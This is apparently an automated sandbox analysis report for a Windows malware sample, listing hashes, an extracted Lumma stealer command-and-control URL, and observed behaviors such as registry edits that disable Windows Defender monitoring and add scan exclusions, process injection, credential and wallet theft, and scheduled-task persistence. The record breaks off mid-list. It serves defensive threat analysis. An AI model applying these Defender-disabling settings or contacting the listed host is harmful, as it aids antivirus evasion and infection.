Analysis
-
max time kernel
148s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
04/10/2024, 00:45
Static task
static1
Behavioral task
behavioral1
Sample
04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe
Resource
win10v2004-20240802-en
General
-
Target
04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe
-
Size
1.9MB
-
MD5
a00b2cfa83db42323e19d954710c74e1
-
SHA1
d24e3546f6b758d64c86e7ac48f422ed97ea729a
-
SHA256
04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a
-
SHA512
cd3d85d24ef07771df20218e7e8743777156151436e58c029a3c89f804c3bbb477dc18fed67f1f5e97d3c5c31522fb673a1a109e47859f683ed7cc600067ec6a
-
SSDEEP
49152:qvnMlvvvqFI3rUUan7yeCz3i96K0nLAcR3YmPXHXcK:64vWI3rJa7yeCzjDnUcRImPXHr
Malware Config
Extracted
lumma
https://beearvagueo.site/api
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ujfGTnqxDJAJlXPO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ujfGTnqxDJAJlXPO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wCCFmxPIU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\WitzacxcsoaTddVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rEeGjZNaAiUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hAvrKMWSYNakC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\skJyvfnXIyXU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\WitzacxcsoaTddVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ujfGTnqxDJAJlXPO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hAvrKMWSYNakC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qAoVUhkTniXvoTDenZR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rEeGjZNaAiUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\skJyvfnXIyXU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ujfGTnqxDJAJlXPO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qAoVUhkTniXvoTDenZR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wCCFmxPIU = "0" reg.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 2064 powershell.exe 932 powershell.EXE 3032 powershell.EXE 2332 powershell.exe 1804 powershell.EXE 3064 powershell.exe 2544 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\International\Geo\Nation lk9Ldxrg3RRzMhQo5WbjR_Uy.exe -
Executes dropped EXE 11 IoCs
pid Process 2228 HLRTzezunT2Ovldb8V_kvkmU.exe 780 lk9Ldxrg3RRzMhQo5WbjR_Uy.exe 1480 1TcV9bBuQfLHLuk8CggizKpL.exe 1816 NBgv1H4QcTrdOqAY8RuX3Rzz.exe 1664 Install.exe 2312 Install.exe 912 service123.exe 2932 ccGDScQhwtMv7tbRf1m2JKtr.exe 568 EBAFBGIDHC.exe 2720 service123.exe 816 TcPDtnB.exe -
Indirect Command Execution 1 TTPs 12 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 912 forfiles.exe 2480 forfiles.exe 1568 forfiles.exe 1780 forfiles.exe 2984 forfiles.exe 1104 forfiles.exe 328 forfiles.exe 2404 forfiles.exe 2376 forfiles.exe 2184 forfiles.exe 1940 forfiles.exe 2072 forfiles.exe -
Loads dropped DLL 34 IoCs
pid Process 548 RegAsm.exe 548 RegAsm.exe 2228 HLRTzezunT2Ovldb8V_kvkmU.exe 2228 HLRTzezunT2Ovldb8V_kvkmU.exe 2228 HLRTzezunT2Ovldb8V_kvkmU.exe 548 RegAsm.exe 548 RegAsm.exe 548 RegAsm.exe 548 RegAsm.exe 2228 HLRTzezunT2Ovldb8V_kvkmU.exe 1664 Install.exe 1664 Install.exe 1664 Install.exe 1664 Install.exe 2312 Install.exe 2312 Install.exe 2312 Install.exe 1480 1TcV9bBuQfLHLuk8CggizKpL.exe 1816 NBgv1H4QcTrdOqAY8RuX3Rzz.exe 1816 NBgv1H4QcTrdOqAY8RuX3Rzz.exe 912 service123.exe 780 lk9Ldxrg3RRzMhQo5WbjR_Uy.exe 1384 WerFault.exe 1384 WerFault.exe 1384 WerFault.exe 1992 MSBuild.exe 1992 MSBuild.exe 1992 MSBuild.exe 1992 MSBuild.exe 1992 MSBuild.exe 2732 WerFault.exe 2732 WerFault.exe 2732 WerFault.exe 2720 service123.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ipinfo.io 11 api.myip.com 12 api.myip.com 33 ipinfo.io 3 api64.ipify.org 4 api64.ipify.org 6 ipinfo.io 29 api64.ipify.org 34 ipinfo.io 37 api.myip.com -
Drops file in System32 directory 11 IoCs
description ioc Process File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol TcPDtnB.exe File created C:\Windows\system32\GroupPolicy\gpt.ini TcPDtnB.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol TcPDtnB.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini TcPDtnB.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2172 set thread context of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 2932 set thread context of 1992 2932 ccGDScQhwtMv7tbRf1m2JKtr.exe 74 PID 568 set thread context of 1640 568 EBAFBGIDHC.exe 78 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\bPUtwrklxNafuwbpPq.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 1384 2932 WerFault.exe 73 2732 568 WerFault.exe 77 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NBgv1H4QcTrdOqAY8RuX3Rzz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lk9Ldxrg3RRzMhQo5WbjR_Uy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ccGDScQhwtMv7tbRf1m2JKtr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1TcV9bBuQfLHLuk8CggizKpL.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 NBgv1H4QcTrdOqAY8RuX3Rzz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString NBgv1H4QcTrdOqAY8RuX3Rzz.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1396 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 18 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" TcPDtnB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000010070eecf615db01 TcPDtnB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ TcPDtnB.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached TcPDtnB.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" TcPDtnB.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0df38ecf615db01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2616 schtasks.exe 2160 schtasks.exe 2624 schtasks.exe 1520 schtasks.exe 2604 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 780 lk9Ldxrg3RRzMhQo5WbjR_Uy.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 2544 powershell.exe 1992 MSBuild.exe 1992 MSBuild.exe 1992 MSBuild.exe 1992 MSBuild.exe 2064 powershell.exe 2064 powershell.exe 2064 powershell.exe 932 powershell.EXE 932 powershell.EXE 932 powershell.EXE 3032 powershell.EXE 3032 powershell.EXE 3032 powershell.EXE 2332 powershell.exe 1804 powershell.EXE 1804 powershell.EXE 1804 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeDebugPrivilege 3064 powershell.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeIncreaseQuotaPrivilege 2080 WMIC.exe Token: SeSecurityPrivilege 2080 WMIC.exe Token: SeTakeOwnershipPrivilege 2080 WMIC.exe Token: SeLoadDriverPrivilege 2080 WMIC.exe Token: SeSystemProfilePrivilege 2080 WMIC.exe Token: SeSystemtimePrivilege 2080 WMIC.exe Token: SeProfSingleProcessPrivilege 2080 WMIC.exe Token: SeIncBasePriorityPrivilege 2080 WMIC.exe Token: SeCreatePagefilePrivilege 2080 WMIC.exe Token: SeBackupPrivilege 2080 WMIC.exe Token: SeRestorePrivilege 2080 WMIC.exe Token: SeShutdownPrivilege 2080 WMIC.exe Token: SeDebugPrivilege 2080 WMIC.exe Token: SeSystemEnvironmentPrivilege 2080 WMIC.exe Token: SeRemoteShutdownPrivilege 2080 WMIC.exe Token: SeUndockPrivilege 2080 WMIC.exe Token: SeManageVolumePrivilege 2080 WMIC.exe Token: 33 2080 WMIC.exe Token: 34 2080 WMIC.exe Token: 35 2080 WMIC.exe Token: SeDebugPrivilege 2064 powershell.exe Token: SeDebugPrivilege 932 powershell.EXE Token: SeDebugPrivilege 3032 powershell.EXE Token: SeDebugPrivilege 2332 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2288 WMIC.exe Token: SeIncreaseQuotaPrivilege 2288 WMIC.exe Token: SeSecurityPrivilege 2288 WMIC.exe Token: SeTakeOwnershipPrivilege 2288 WMIC.exe Token: SeLoadDriverPrivilege 2288 WMIC.exe Token: SeSystemtimePrivilege 2288 WMIC.exe Token: SeBackupPrivilege 2288 WMIC.exe Token: SeRestorePrivilege 2288 WMIC.exe Token: SeShutdownPrivilege 2288 WMIC.exe Token: SeSystemEnvironmentPrivilege 2288 WMIC.exe Token: SeUndockPrivilege 2288 WMIC.exe Token: SeManageVolumePrivilege 2288 WMIC.exe Token: SeDebugPrivilege 1804 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2172 wrote to memory of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 2172 wrote to memory of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 2172 wrote to memory of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 2172 wrote to memory of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 2172 wrote to memory of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 2172 wrote to memory of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 2172 wrote to memory of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 2172 wrote to memory of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 2172 wrote to memory of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 2172 wrote to memory of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 2172 wrote to memory of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 2172 wrote to memory of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 2172 wrote to memory of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 2172 wrote to memory of 548 2172 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe 31 PID 548 wrote to memory of 2228 548 RegAsm.exe 34 PID 548 wrote to memory of 2228 548 RegAsm.exe 34 PID 548 wrote to memory of 2228 548 RegAsm.exe 34 PID 548 wrote to memory of 2228 548 RegAsm.exe 34 PID 548 wrote to memory of 2228 548 RegAsm.exe 34 PID 548 wrote to memory of 2228 548 RegAsm.exe 34 PID 548 wrote to memory of 2228 548 RegAsm.exe 34 PID 548 wrote to memory of 780 548 RegAsm.exe 35 PID 548 wrote to memory of 780 548 RegAsm.exe 35 PID 548 wrote to memory of 780 548 RegAsm.exe 35 PID 548 wrote to memory of 780 548 RegAsm.exe 35 PID 548 wrote to memory of 1480 548 RegAsm.exe 36 PID 548 wrote to memory of 1480 548 RegAsm.exe 36 PID 548 wrote to memory of 1480 548 RegAsm.exe 36 PID 548 wrote to memory of 1480 548 RegAsm.exe 36 PID 548 wrote to memory of 1816 548 RegAsm.exe 37 PID 548 wrote to memory of 1816 548 RegAsm.exe 37 PID 548 wrote to memory of 1816 548 RegAsm.exe 37 PID 548 wrote to memory of 1816 548 RegAsm.exe 37 PID 2228 wrote to memory of 1664 2228 HLRTzezunT2Ovldb8V_kvkmU.exe 38 PID 2228 wrote to memory of 1664 2228 HLRTzezunT2Ovldb8V_kvkmU.exe 38 PID 2228 wrote to memory of 1664 2228 HLRTzezunT2Ovldb8V_kvkmU.exe 38 PID 2228 wrote to memory of 1664 2228 HLRTzezunT2Ovldb8V_kvkmU.exe 38 PID 2228 wrote to memory of 1664 2228 HLRTzezunT2Ovldb8V_kvkmU.exe 38 PID 2228 wrote to memory of 1664 2228 HLRTzezunT2Ovldb8V_kvkmU.exe 38 PID 2228 wrote to memory of 1664 2228 HLRTzezunT2Ovldb8V_kvkmU.exe 38 PID 1664 wrote to memory of 2312 1664 Install.exe 39 PID 1664 wrote to memory of 